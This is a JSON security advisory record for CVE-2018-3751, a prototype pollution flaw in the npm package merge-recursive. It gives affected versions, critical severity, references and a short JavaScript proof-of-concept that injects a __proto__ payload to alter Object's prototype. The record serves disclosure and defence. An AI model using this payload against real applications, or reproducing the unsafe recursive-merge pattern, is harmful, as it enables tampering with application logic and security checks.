{"id":"GHSA-cvxm-f295-x957","summary":"Prototype Pollution in merge-recursive","details":"All versions of `merge-recursive` are vulnerable to Prototype Pollution. When malicious user input is merged with another object it allows the attacker to modify the prototype of Object via `__proto__` causing the addition or modification of an existing property.\n\nProof of concept:\n\n```js\nvar merge = require('merge-recursive').recursive;\nvar malicious_payload = '{\"__proto__\":{\"oops\":\"It works !\"}}';\n\nvar a = {};\nconsole.log(\"Before : \" + a.oops);\nmerge({}, JSON.parse(malicious_payload));\nconsole.log(\"After : \" + a.oops);\n```\n\n\n## Recommendation\n\nThere is currently no fix available. ","aliases":["CVE-2018-3751"],"modified":"2023-11-08T04:00:18.903087Z","published":"2018-09-18T13:46:06Z","database_specific":{"nvd_published_at":null,"cwe_ids":["CWE-20"],"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2020-06-16T21:33:01Z"},"references":[{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2018-3751"},{"type":"WEB","url":"https://hackerone.com/reports/311337"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-cvxm-f295-x957"},{"type":"WEB","url":"https://www.npmjs.com/advisories/715"}],"affected":[{"package":{"name":"merge-recursive","ecosystem":"npm","purl":"pkg:npm/merge-recursive"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"last_affected":"0.0.3"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/09/GHSA-cvxm-f295-x957/GHSA-cvxm-f295-x957.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}]}